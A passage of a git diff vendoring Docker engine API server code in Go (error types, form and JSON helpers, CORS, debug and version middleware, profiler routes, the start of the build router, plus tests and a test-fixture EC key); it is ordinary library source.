"folder/hierarchy/keyfile") + + if key, err := LoadOrCreateTrustKey(tmpKeyFile); err != nil || key == nil { + t.Fatalf("expected a new key file, got : %v and %v", err, key) + } + + if _, err := os.Stat(tmpKeyFile); err != nil { + t.Fatalf("Expected to find a file %s, got %v", tmpKeyFile, err) + } + + // With no path at all + defer os.Remove("keyfile") + if key, err := LoadOrCreateTrustKey("keyfile"); err != nil || key == nil { + t.Fatalf("expected a new key file, got : %v and %v", err, key) + } + + if _, err := os.Stat("keyfile"); err != nil { + t.Fatalf("Expected to find a file keyfile, got %v", err) + } +} + +func TestLoadOrCreateTrustKeyLoadValidKey(t *testing.T) { + tmpKeyFile := filepath.Join("fixtures", "keyfile") + + if key, err := LoadOrCreateTrustKey(tmpKeyFile); err != nil || key == nil { + t.Fatalf("expected a key file, got : %v and %v", err, key) + } +} diff --git a/vendor/github.com/docker/docker/api/common_unix.go b/vendor/github.com/docker/docker/api/common_unix.go new file mode 100644 index 0000000000..081e61c451 --- /dev/null +++ b/vendor/github.com/docker/docker/api/common_unix.go @@ -0,0 +1,6 @@ +// +build !windows + +package api + +// MinVersion represents Minimum REST API version supported +const MinVersion string = "1.12" diff --git a/vendor/github.com/docker/docker/api/common_windows.go b/vendor/github.com/docker/docker/api/common_windows.go new file mode 100644 index 0000000000..d930fa0720 --- /dev/null +++ b/vendor/github.com/docker/docker/api/common_windows.go @@ -0,0 +1,8 @@ +package api + +// MinVersion represents Minimum REST API version supported +// Technically the first daemon API version released on Windows is v1.25 in +// engine version 1.13. However, some clients are explicitly using downlevel +// APIs (eg docker-compose v2.1 file format) and that is just too restrictive. +// Hence also allowing 1.24 on Windows. +const MinVersion string = "1.24" diff --git a/vendor/github.com/docker/docker/api/errors/errors.go b/vendor/github.com/docker/docker/api/errors/errors.go new file mode 100644 index 0000000000..29fd2545dc --- /dev/null +++ b/vendor/github.com/docker/docker/api/errors/errors.go @@ -0,0 +1,47 @@ +package errors + +import "net/http" + +// apiError is an error wrapper that also +// holds information about response status codes. +type apiError struct { + error + statusCode int +} + +// HTTPErrorStatusCode returns a status code. +func (e apiError) HTTPErrorStatusCode() int { + return e.statusCode +} + +// NewErrorWithStatusCode allows you to associate +// a specific HTTP Status Code to an error. +// The Server will take that code and set +// it as the response status. +func NewErrorWithStatusCode(err error, code int) error { + return apiError{err, code} +} + +// NewBadRequestError creates a new API error +// that has the 400 HTTP status code associated to it. +func NewBadRequestError(err error) error { + return NewErrorWithStatusCode(err, http.StatusBadRequest) +} + +// NewRequestForbiddenError creates a new API error +// that has the 403 HTTP status code associated to it. +func NewRequestForbiddenError(err error) error { + return NewErrorWithStatusCode(err, http.StatusForbidden) +} + +// NewRequestNotFoundError creates a new API error +// that has the 404 HTTP status code associated to it. +func NewRequestNotFoundError(err error) error { + return NewErrorWithStatusCode(err, http.StatusNotFound) +} + +// NewRequestConflictError creates a new API error +// that has the 409 HTTP status code associated to it. +func NewRequestConflictError(err error) error { + return NewErrorWithStatusCode(err, http.StatusConflict) +} diff --git a/vendor/github.com/docker/docker/api/fixtures/keyfile b/vendor/github.com/docker/docker/api/fixtures/keyfile new file mode 100644 index 0000000000..322f254404 --- /dev/null +++ b/vendor/github.com/docker/docker/api/fixtures/keyfile @@ -0,0 +1,7 @@ +-----BEGIN EC PRIVATE KEY----- +keyID: AWX2:I27X:WQFX:IOMK:CNAK:O7PW:VYNB:ZLKC:CVAE:YJP2:SI4A:XXAY + +MHcCAQEEILHTRWdcpKWsnORxSFyBnndJ4ROU41hMtr/GCiLVvwBQoAoGCCqGSM49 +AwEHoUQDQgAElpVFbQ2V2UQKajqdE3fVxJ+/pE/YuEFOxWbOxF2be19BY209/iky +NzeFFK7SLpQ4CBJ7zDVXOHsMzrkY/GquGA== +-----END EC PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/api/server/httputils/decoder.go b/vendor/github.com/docker/docker/api/server/httputils/decoder.go new file mode 100644 index 0000000000..458eac5600 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/httputils/decoder.go @@ -0,0 +1,16 @@ +package httputils + +import ( + "io" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/network" +) + +// ContainerDecoder specifies how +// to translate an io.Reader into +// container configuration. +type ContainerDecoder interface { + DecodeConfig(src io.Reader) (*container.Config, *container.HostConfig, *network.NetworkingConfig, error) + DecodeHostConfig(src io.Reader) (*container.HostConfig, error) +} diff --git a/vendor/github.com/docker/docker/api/server/httputils/errors.go b/vendor/github.com/docker/docker/api/server/httputils/errors.go new file mode 100644 index 0000000000..59098a9df0 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/httputils/errors.go @@ -0,0 +1,101 @@ +package httputils + +import ( + "net/http" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/versions" + "github.com/gorilla/mux" + "google.golang.org/grpc" +) + +// httpStatusError is an interface +// that errors with custom status codes +// implement to tell the api layer +// which response status to set. +type httpStatusError interface { + HTTPErrorStatusCode() int +} + +// inputValidationError is an interface +// that errors generated by invalid +// inputs can implement to tell the +// api layer to set a 400 status code +// in the response. +type inputValidationError interface { + IsValidationError() bool +} + +// GetHTTPErrorStatusCode retrieves status code from error message +func GetHTTPErrorStatusCode(err error) int { + if err == nil { + logrus.WithFields(logrus.Fields{"error": err}).Error("unexpected HTTP error handling") + return http.StatusInternalServerError + } + + var statusCode int + errMsg := err.Error() + + switch e := err.(type) { + case httpStatusError: + statusCode = e.HTTPErrorStatusCode() + case inputValidationError: + statusCode = http.StatusBadRequest + default: + // FIXME: this is brittle and should not be necessary, but we still need to identify if + // there are errors falling back into this logic. + // If we need to differentiate between different possible error types, + // we should create appropriate error types that implement the httpStatusError interface. + errStr := strings.ToLower(errMsg) + for _, status := range []struct { + keyword string + code int + }{ + {"not found", http.StatusNotFound}, + {"no such", http.StatusNotFound}, + {"bad parameter", http.StatusBadRequest}, + {"no command", http.StatusBadRequest}, + {"conflict", http.StatusConflict}, + {"impossible", http.StatusNotAcceptable}, + {"wrong login/password", http.StatusUnauthorized}, + {"unauthorized", http.StatusUnauthorized}, + {"hasn't been activated", http.StatusForbidden}, + {"this node", http.StatusServiceUnavailable}, + } { + if strings.Contains(errStr, status.keyword) { + statusCode = status.code + break + } + } + } + + if statusCode == 0 { + statusCode = http.StatusInternalServerError + } + + return statusCode +} + +func apiVersionSupportsJSONErrors(version string) bool { + const firstAPIVersionWithJSONErrors = "1.23" + return version == "" || versions.GreaterThan(version, firstAPIVersionWithJSONErrors) +} + +// MakeErrorHandler makes an HTTP handler that decodes a Docker error and +// returns it in the response. +func MakeErrorHandler(err error) http.HandlerFunc { + return func(w http.ResponseWriter, r *http.Request) { + statusCode := GetHTTPErrorStatusCode(err) + vars := mux.Vars(r) + if apiVersionSupportsJSONErrors(vars["version"]) { + response := &types.ErrorResponse{ + Message: err.Error(), + } + WriteJSON(w, statusCode, response) + } else { + http.Error(w, grpc.ErrorDesc(err), statusCode) + } + } +} diff --git a/vendor/github.com/docker/docker/api/server/httputils/form.go b/vendor/github.com/docker/docker/api/server/httputils/form.go new file mode 100644 index 0000000000..20188c12d8 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/httputils/form.go @@ -0,0 +1,73 @@ +package httputils + +import ( + "fmt" + "net/http" + "path/filepath" + "strconv" + "strings" +) + +// BoolValue transforms a form value in different formats into a boolean type. +func BoolValue(r *http.Request, k string) bool { + s := strings.ToLower(strings.TrimSpace(r.FormValue(k))) + return !(s == "" || s == "0" || s == "no" || s == "false" || s == "none") +} + +// BoolValueOrDefault returns the default bool passed if the query param is +// missing, otherwise it's just a proxy to boolValue above +func BoolValueOrDefault(r *http.Request, k string, d bool) bool { + if _, ok := r.Form[k]; !ok { + return d + } + return BoolValue(r, k) +} + +// Int64ValueOrZero parses a form value into an int64 type. +// It returns 0 if the parsing fails. +func Int64ValueOrZero(r *http.Request, k string) int64 { + val, err := Int64ValueOrDefault(r, k, 0) + if err != nil { + return 0 + } + return val +} + +// Int64ValueOrDefault parses a form value into an int64 type. If there is an +// error, returns the error. If there is no value returns the default value. +func Int64ValueOrDefault(r *http.Request, field string, def int64) (int64, error) { + if r.Form.Get(field) != "" { + value, err := strconv.ParseInt(r.Form.Get(field), 10, 64) + if err != nil { + return value, err + } + return value, nil + } + return def, nil +} + +// ArchiveOptions stores archive information for different operations. +type ArchiveOptions struct { + Name string + Path string +} + +// ArchiveFormValues parses form values and turns them into ArchiveOptions. +// It fails if the archive name and path are not in the request. +func ArchiveFormValues(r *http.Request, vars map[string]string) (ArchiveOptions, error) { + if err := ParseForm(r); err != nil { + return ArchiveOptions{}, err + } + + name := vars["name"] + path := filepath.FromSlash(r.Form.Get("path")) + + switch { + case name == "": + return ArchiveOptions{}, fmt.Errorf("bad parameter: 'name' cannot be empty") + case path == "": + return ArchiveOptions{}, fmt.Errorf("bad parameter: 'path' cannot be empty") + } + + return ArchiveOptions{name, path}, nil +} diff --git a/vendor/github.com/docker/docker/api/server/httputils/form_test.go b/vendor/github.com/docker/docker/api/server/httputils/form_test.go new file mode 100644 index 0000000000..c56f7c15e3 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/httputils/form_test.go @@ -0,0 +1,105 @@ +package httputils + +import ( + "net/http" + "net/url" + "testing" +) + +func TestBoolValue(t *testing.T) { + cases := map[string]bool{ + "": false, + "0": false, + "no": false, + "false": false, + "none": false, + "1": true, + "yes": true, + "true": true, + "one": true, + "100": true, + } + + for c, e := range cases { + v := url.Values{} + v.Set("test", c) + r, _ := http.NewRequest("POST", "", nil) + r.Form = v + + a := BoolValue(r, "test") + if a != e { + t.Fatalf("Value: %s, expected: %v, actual: %v", c, e, a) + } + } +} + +func TestBoolValueOrDefault(t *testing.T) { + r, _ := http.NewRequest("GET", "", nil) + if !BoolValueOrDefault(r, "queryparam", true) { + t.Fatal("Expected to get true default value, got false") + } + + v := url.Values{} + v.Set("param", "") + r, _ = http.NewRequest("GET", "", nil) + r.Form = v + if BoolValueOrDefault(r, "param", true) { + t.Fatal("Expected not to get true") + } +} + +func TestInt64ValueOrZero(t *testing.T) { + cases := map[string]int64{ + "": 0, + "asdf": 0, + "0": 0, + "1": 1, + } + + for c, e := range cases { + v := url.Values{} + v.Set("test", c) + r, _ := http.NewRequest("POST", "", nil) + r.Form = v + + a := Int64ValueOrZero(r, "test") + if a != e { + t.Fatalf("Value: %s, expected: %v, actual: %v", c, e, a) + } + } +} + +func TestInt64ValueOrDefault(t *testing.T) { + cases := map[string]int64{ + "": -1, + "-1": -1, + "42": 42, + } + + for c, e := range cases { + v := url.Values{} + v.Set("test", c) + r, _ := http.NewRequest("POST", "", nil) + r.Form = v + + a, err := Int64ValueOrDefault(r, "test", -1) + if a != e { + t.Fatalf("Value: %s, expected: %v, actual: %v", c, e, a) + } + if err != nil { + t.Fatalf("Error should be nil, but received: %s", err) + } + } +} + +func TestInt64ValueOrDefaultWithError(t *testing.T) { + v := url.Values{} + v.Set("test", "invalid") + r, _ := http.NewRequest("POST", "", nil) + r.Form = v + + _, err := Int64ValueOrDefault(r, "test", -1) + if err == nil { + t.Fatalf("Expected an error.") + } +} diff --git a/vendor/github.com/docker/docker/api/server/httputils/httputils.go b/vendor/github.com/docker/docker/api/server/httputils/httputils.go new file mode 100644 index 0000000000..7930ff7a07 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/httputils/httputils.go @@ -0,0 +1,90 @@ +package httputils + +import ( + "fmt" + "io" + "net/http" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/api" +) + +// APIVersionKey is the client's requested API version. +const APIVersionKey = "api-version" + +// UAStringKey is used as key type for user-agent string in net/context struct +const UAStringKey = "upstream-user-agent" + +// APIFunc is an adapter to allow the use of ordinary functions as Docker API endpoints. +// Any function that has the appropriate signature can be registered as an API endpoint (e.g. getVersion). +type APIFunc func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error + +// HijackConnection interrupts the http response writer to get the +// underlying connection and operate with it. +func HijackConnection(w http.ResponseWriter) (io.ReadCloser, io.Writer, error) { + conn, _, err := w.(http.Hijacker).Hijack() + if err != nil { + return nil, nil, err + } + // Flush the options to make sure the client sets the raw mode + conn.Write([]byte{}) + return conn, conn, nil +} + +// CloseStreams ensures that a list for http streams are properly closed. +func CloseStreams(streams ...interface{}) { + for _, stream := range streams { + if tcpc, ok := stream.(interface { + CloseWrite() error + }); ok { + tcpc.CloseWrite() + } else if closer, ok := stream.(io.Closer); ok { + closer.Close() + } + } +} + +// CheckForJSON makes sure that the request's Content-Type is application/json. +func CheckForJSON(r *http.Request) error { + ct := r.Header.Get("Content-Type") + + // No Content-Type header is ok as long as there's no Body + if ct == "" { + if r.Body == nil || r.ContentLength == 0 { + return nil + } + } + + // Otherwise it better be json + if api.MatchesContentType(ct, "application/json") { + return nil + } + return fmt.Errorf("Content-Type specified (%s) must be 'application/json'", ct) +} + +// ParseForm ensures the request form is parsed even with invalid content types. +// If we don't do this, POST method without Content-type (even with empty body) will fail. +func ParseForm(r *http.Request) error { + if r == nil { + return nil + } + if err := r.ParseForm(); err != nil && !strings.HasPrefix(err.Error(), "mime:") { + return err + } + return nil +} + +// VersionFromContext returns an API version from the context using APIVersionKey. +// It panics if the context value does not have version.Version type. +func VersionFromContext(ctx context.Context) (ver string) { + if ctx == nil { + return + } + val := ctx.Value(APIVersionKey) + if val == nil { + return + } + return val.(string) +} diff --git a/vendor/github.com/docker/docker/api/server/httputils/httputils_write_json.go b/vendor/github.com/docker/docker/api/server/httputils/httputils_write_json.go new file mode 100644 index 0000000000..4787cc3c33 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/httputils/httputils_write_json.go @@ -0,0 +1,17 @@ +// +build go1.7 + +package httputils + +import ( + "encoding/json" + "net/http" +) + +// WriteJSON writes the value v to the http response stream as json with standard json encoding. +func WriteJSON(w http.ResponseWriter, code int, v interface{}) error { + w.Header().Set("Content-Type", "application/json") + w.WriteHeader(code) + enc := json.NewEncoder(w) + enc.SetEscapeHTML(false) + return enc.Encode(v) +} diff --git a/vendor/github.com/docker/docker/api/server/httputils/httputils_write_json_go16.go b/vendor/github.com/docker/docker/api/server/httputils/httputils_write_json_go16.go new file mode 100644 index 0000000000..bdc6981738 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/httputils/httputils_write_json_go16.go @@ -0,0 +1,16 @@ +// +build go1.6,!go1.7 + +package httputils + +import ( + "encoding/json" + "net/http" +) + +// WriteJSON writes the value v to the http response stream as json with standard json encoding. +func WriteJSON(w http.ResponseWriter, code int, v interface{}) error { + w.Header().Set("Content-Type", "application/json") + w.WriteHeader(code) + enc := json.NewEncoder(w) + return enc.Encode(v) +} diff --git a/vendor/github.com/docker/docker/api/server/middleware.go b/vendor/github.com/docker/docker/api/server/middleware.go new file mode 100644 index 0000000000..537ce8028f --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/middleware.go @@ -0,0 +1,24 @@ +package server + +import ( + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/server/middleware" +) + +// handlerWithGlobalMiddlewares wraps the handler function for a request with +// the server's global middlewares. The order of the middlewares is backwards, +// meaning that the first in the list will be evaluated last. +func (s *Server) handlerWithGlobalMiddlewares(handler httputils.APIFunc) httputils.APIFunc { + next := handler + + for _, m := range s.middlewares { + next = m.WrapHandler(next) + } + + if s.cfg.Logging && logrus.GetLevel() == logrus.DebugLevel { + next = middleware.DebugRequestMiddleware(next) + } + + return next +} diff --git a/vendor/github.com/docker/docker/api/server/middleware/cors.go b/vendor/github.com/docker/docker/api/server/middleware/cors.go new file mode 100644 index 0000000000..ea725dbc72 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/middleware/cors.go @@ -0,0 +1,37 @@ +package middleware + +import ( + "net/http" + + "github.com/Sirupsen/logrus" + "golang.org/x/net/context" +) + +// CORSMiddleware injects CORS headers to each request +// when it's configured. +type CORSMiddleware struct { + defaultHeaders string +} + +// NewCORSMiddleware creates a new CORSMiddleware with default headers. +func NewCORSMiddleware(d string) CORSMiddleware { + return CORSMiddleware{defaultHeaders: d} +} + +// WrapHandler returns a new handler function wrapping the previous one in the request chain. +func (c CORSMiddleware) WrapHandler(handler func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error) func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + return func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + // If "api-cors-header" is not given, but "api-enable-cors" is true, we set cors to "*" + // otherwise, all head values will be passed to HTTP handler + corsHeaders := c.defaultHeaders + if corsHeaders == "" { + corsHeaders = "*" + } + + logrus.Debugf("CORS header is enabled and set to: %s", corsHeaders) + w.Header().Add("Access-Control-Allow-Origin", corsHeaders) + w.Header().Add("Access-Control-Allow-Headers", "Origin, X-Requested-With, Content-Type, Accept, X-Registry-Auth") + w.Header().Add("Access-Control-Allow-Methods", "HEAD, GET, POST, DELETE, PUT, OPTIONS") + return handler(ctx, w, r, vars) + } +} diff --git a/vendor/github.com/docker/docker/api/server/middleware/debug.go b/vendor/github.com/docker/docker/api/server/middleware/debug.go new file mode 100644 index 0000000000..8c8567669b --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/middleware/debug.go @@ -0,0 +1,76 @@ +package middleware + +import ( + "bufio" + "encoding/json" + "io" + "net/http" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/pkg/ioutils" + "golang.org/x/net/context" +) + +// DebugRequestMiddleware dumps the request to logger +func DebugRequestMiddleware(handler func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error) func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + return func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + logrus.Debugf("Calling %s %s", r.Method, r.RequestURI) + + if r.Method != "POST" { + return handler(ctx, w, r, vars) + } + if err := httputils.CheckForJSON(r); err != nil { + return handler(ctx, w, r, vars) + } + maxBodySize := 4096 // 4KB + if r.ContentLength > int64(maxBodySize) { + return handler(ctx, w, r, vars) + } + + body := r.Body + bufReader := bufio.NewReaderSize(body, maxBodySize) + r.Body = ioutils.NewReadCloserWrapper(bufReader, func() error { return body.Close() }) + + b, err := bufReader.Peek(maxBodySize) + if err != io.EOF { + // either there was an error reading, or the buffer is full (in which case the request is too large) + return handler(ctx, w, r, vars) + } + + var postForm map[string]interface{} + if err := json.Unmarshal(b, &postForm); err == nil { + maskSecretKeys(postForm) + formStr, errMarshal := json.Marshal(postForm) + if errMarshal == nil { + logrus.Debugf("form data: %s", string(formStr)) + } else { + logrus.Debugf("form data: %q", postForm) + } + } + + return handler(ctx, w, r, vars) + } +} + +func maskSecretKeys(inp interface{}) { + if arr, ok := inp.([]interface{}); ok { + for _, f := range arr { + maskSecretKeys(f) + } + return + } + if form, ok := inp.(map[string]interface{}); ok { + loop0: + for k, v := range form { + for _, m := range []string{"password", "secret", "jointoken", "unlockkey"} { + if strings.EqualFold(m, k) { + form[k] = "*****" + continue loop0 + } + } + maskSecretKeys(v) + } + } +} diff --git a/vendor/github.com/docker/docker/api/server/middleware/experimental.go b/vendor/github.com/docker/docker/api/server/middleware/experimental.go new file mode 100644 index 0000000000..b8f56e88b4 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/middleware/experimental.go @@ -0,0 +1,29 @@ +package middleware + +import ( + "net/http" + + "golang.org/x/net/context" +) + +// ExperimentalMiddleware is a the middleware in charge of adding the +// 'Docker-Experimental' header to every outgoing request +type ExperimentalMiddleware struct { + experimental string +} + +// NewExperimentalMiddleware creates a new ExperimentalMiddleware +func NewExperimentalMiddleware(experimentalEnabled bool) ExperimentalMiddleware { + if experimentalEnabled { + return ExperimentalMiddleware{"true"} + } + return ExperimentalMiddleware{"false"} +} + +// WrapHandler returns a new handler function wrapping the previous one in the request chain. +func (e ExperimentalMiddleware) WrapHandler(handler func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error) func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + return func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + w.Header().Set("Docker-Experimental", e.experimental) + return handler(ctx, w, r, vars) + } +} diff --git a/vendor/github.com/docker/docker/api/server/middleware/middleware.go b/vendor/github.com/docker/docker/api/server/middleware/middleware.go new file mode 100644 index 0000000000..dc1f5bfa0d --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/middleware/middleware.go @@ -0,0 +1,13 @@ +package middleware + +import ( + "net/http" + + "golang.org/x/net/context" +) + +// Middleware is an interface to allow the use of ordinary functions as Docker API filters. +// Any struct that has the appropriate signature can be registered as a middleware. +type Middleware interface { + WrapHandler(func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error) func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error +} diff --git a/vendor/github.com/docker/docker/api/server/middleware/version.go b/vendor/github.com/docker/docker/api/server/middleware/version.go new file mode 100644 index 0000000000..11014659e5 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/middleware/version.go @@ -0,0 +1,50 @@ +package middleware + +import ( + "fmt" + "net/http" + "runtime" + + "github.com/docker/docker/api/errors" + "github.com/docker/docker/api/types/versions" + "golang.org/x/net/context" +) + +// VersionMiddleware is a middleware that +// validates the client and server versions. +type VersionMiddleware struct { + serverVersion string + defaultVersion string + minVersion string +} + +// NewVersionMiddleware creates a new VersionMiddleware +// with the default versions. +func NewVersionMiddleware(s, d, m string) VersionMiddleware { + return VersionMiddleware{ + serverVersion: s, + defaultVersion: d, + minVersion: m, + } +} + +// WrapHandler returns a new handler function wrapping the previous one in the request chain. +func (v VersionMiddleware) WrapHandler(handler func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error) func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + return func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + apiVersion := vars["version"] + if apiVersion == "" { + apiVersion = v.defaultVersion + } + + if versions.LessThan(apiVersion, v.minVersion) { + return errors.NewBadRequestError(fmt.Errorf("client version %s is too old. Minimum supported API version is %s, please upgrade your client to a newer version", apiVersion, v.minVersion)) + } + + header := fmt.Sprintf("Docker/%s (%s)", v.serverVersion, runtime.GOOS) + w.Header().Set("Server", header) + w.Header().Set("API-Version", v.defaultVersion) + ctx = context.WithValue(ctx, "api-version", apiVersion) + return handler(ctx, w, r, vars) + } + +} diff --git a/vendor/github.com/docker/docker/api/server/middleware/version_test.go b/vendor/github.com/docker/docker/api/server/middleware/version_test.go new file mode 100644 index 0000000000..9e72efd78d --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/middleware/version_test.go @@ -0,0 +1,57 @@ +package middleware + +import ( + "net/http" + "net/http/httptest" + "strings" + "testing" + + "github.com/docker/docker/api/server/httputils" + "golang.org/x/net/context" +) + +func TestVersionMiddleware(t *testing.T) { + handler := func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if httputils.VersionFromContext(ctx) == "" { + t.Fatalf("Expected version, got empty string") + } + return nil + } + + defaultVersion := "1.10.0" + minVersion := "1.2.0" + m := NewVersionMiddleware(defaultVersion, defaultVersion, minVersion) + h := m.WrapHandler(handler) + + req, _ := http.NewRequest("GET", "/containers/json", nil) + resp := httptest.NewRecorder() + ctx := context.Background() + if err := h(ctx, resp, req, map[string]string{}); err != nil { + t.Fatal(err) + } +} + +func TestVersionMiddlewareWithErrors(t *testing.T) { + handler := func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if httputils.VersionFromContext(ctx) == "" { + t.Fatalf("Expected version, got empty string") + } + return nil + } + + defaultVersion := "1.10.0" + minVersion := "1.2.0" + m := NewVersionMiddleware(defaultVersion, defaultVersion, minVersion) + h := m.WrapHandler(handler) + + req, _ := http.NewRequest("GET", "/containers/json", nil) + resp := httptest.NewRecorder() + ctx := context.Background() + + vars := map[string]string{"version": "0.1"} + err := h(ctx, resp, req, vars) + + if !strings.Contains(err.Error(), "client version 0.1 is too old. Minimum supported API version is 1.2.0") { + t.Fatalf("Expected too old client error, got %v", err) + } +} diff --git a/vendor/github.com/docker/docker/api/server/profiler.go b/vendor/github.com/docker/docker/api/server/profiler.go new file mode 100644 index 0000000000..8bf8384fdb --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/profiler.go @@ -0,0 +1,41 @@ +package server + +import ( + "expvar" + "fmt" + "net/http" + "net/http/pprof" + + "github.com/gorilla/mux" +) + +const debugPathPrefix = "/debug/" + +func profilerSetup(mainRouter *mux.Router) { + var r = mainRouter.PathPrefix(debugPathPrefix).Subrouter() + r.HandleFunc("/vars", expVars) + r.HandleFunc("/pprof/", pprof.Index) + r.HandleFunc("/pprof/cmdline", pprof.Cmdline) + r.HandleFunc("/pprof/profile", pprof.Profile) + r.HandleFunc("/pprof/symbol", pprof.Symbol) + r.HandleFunc("/pprof/trace", pprof.Trace) + r.HandleFunc("/pprof/block", pprof.Handler("block").ServeHTTP) + r.HandleFunc("/pprof/heap", pprof.Handler("heap").ServeHTTP) + r.HandleFunc("/pprof/goroutine", pprof.Handler("goroutine").ServeHTTP) + r.HandleFunc("/pprof/threadcreate", pprof.Handler("threadcreate").ServeHTTP) +} + +// Replicated from expvar.go as not public. +func expVars(w http.ResponseWriter, r *http.Request) { + first := true + w.Header().Set("Content-Type", "application/json; charset=utf-8") + fmt.Fprintf(w, "{\n") + expvar.Do(func(kv expvar.KeyValue) { + if !first { + fmt.Fprintf(w, ",\n") + } + first = false + fmt.Fprintf(w, "%q: %s", kv.Key, kv.Value) + }) + fmt.Fprintf(w, "\n}\n") +} diff --git a/vendor/github.com/docker/docker/api/server/router/build/backend.go b/vendor/github.com/docker/docker/api/server/router/build/backend.go new file mode 100644 index 0000000000..0f01c11af4 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/build/backend.go @@ -0,0 +1,20 @@ +package build + +import ( + "io" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "golang.org/x/net/context" +) + +// Backend abstracts an image builder whose only purpose is to build an image referenced by an imageID. +type Backend interface { + // Build builds a Docker image referenced by an imageID string. + // + // Note: Tagging an image should not be done by a Builder, it should instead be done + // by the caller. + // + // TODO: make this return a reference instead of string + BuildFromContext(ctx context.Context, src io.ReadCloser, remote string, buildOptions *types.ImageBuildOptions, pg backend.ProgressWriter) (string, error) +} diff --git a/vendor/github.com/docker/docker/api/server/router/build/build.go b/vendor/github.com/docker/docker/api/server/router/build/build.go new file mode 100644 index 0000000000..959498e0f1 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/build/build.go @@ -0,0 +1,29 @@ +package build + +import "github.com/docker/docker/api/server/router" + +// buildRouter is a router to talk with the build controller +type buildRouter struct { + backend Backend + routes []router.Route +} + +// NewRouter initializes a new build router +func NewRouter(b Backend) router.Router { + r := &buildRouter{ + backend: b, + } + r.initRoutes() + return r +} + +// Routes returns the available routers to the build controller +func (r *buildRouter) Routes() []router.Route { + return r.routes +} + +func (r *buildRouter) initRoutes() { + r.routes = []router.Route{ + router.Cancellable(router.NewPostRoute("/build", r.postBuild)), + } +} diff --git a/vendor/github.com/docker/docker/api/server/router/build/build_routes.go b/vendor/github.com/docker/docker/api/server/router/build/build_routes.go new file mode 100644 index 0000000000..75425b19fb --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/build/build_routes.go @@ -0,0 +1,225 @@ +package build + +import ( + "bytes" + "encoding/base64" + "encoding/json" + "fmt" + "io" + "net/http" + "runtime" + "strconv" + "strings" + "sync" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/pkg/streamformatter" + "github.com/docker/go-units" + "golang.org/x/net/context" +) + +func newImageBuildOptions(ctx context.Context, r *http.Request) (*types.ImageBuildOptions, error) { + version := httputils.VersionFromContext(ctx) + options := &types.ImageBuildOptions{} + if httputils.BoolValue(r, "forcerm") && versions.GreaterThanOrEqualTo(version, "1.12") { + options.Remove = true + } else if r.FormValue("rm") == "" && versions.GreaterThanOrEqualTo(version, "1.12") { + options.Remove = true + } else { + options.Remove = httputils.BoolValue(r, "rm") + } + if httputils.BoolValue(r, "pull") && versions.GreaterThanOrEqualTo(version, "1.16") { + options.PullParent = true + } + + options.Dockerfile = r.FormValue("dockerfile") + options.SuppressOutput = httputils.BoolValue(r, "q") + options.NoCache = httputils.BoolValue(r, "nocache") + options.ForceRemove = httputils.BoolValue(r, "forcerm") + options.MemorySwap = httputils.Int64ValueOrZero(r, "memswap") + options.Memory = httputils.Int64ValueOrZero(r, "memory") + options.CPUShares = httputils.Int64ValueOrZero(r, "cpushares") + options.CPUPeriod = httputils.Int64ValueOrZero(r, "cpuperiod") + options.CPUQuota = httputils.Int64ValueOrZero(r, "cpuquota") + options.CPUSetCPUs = r.FormValue("cpusetcpus") + options.CPUSetMems = r.FormValue("cpusetmems") + options.CgroupParent = r.FormValue("cgroupparent") + options.NetworkMode = r.FormValue("networkmode") + options.Tags = r.Form["t"] + options.SecurityOpt = r.Form["securityopt"] + options.Squash = httputils.BoolValue(r, "squash") + + if r.Form.Get("shmsize") != "" { + shmSize, err := strconv.ParseInt(r.Form.Get("shmsize"), 10, 64) + if err != nil { + return nil, err + } + options.ShmSize = shmSize + } + + if i := 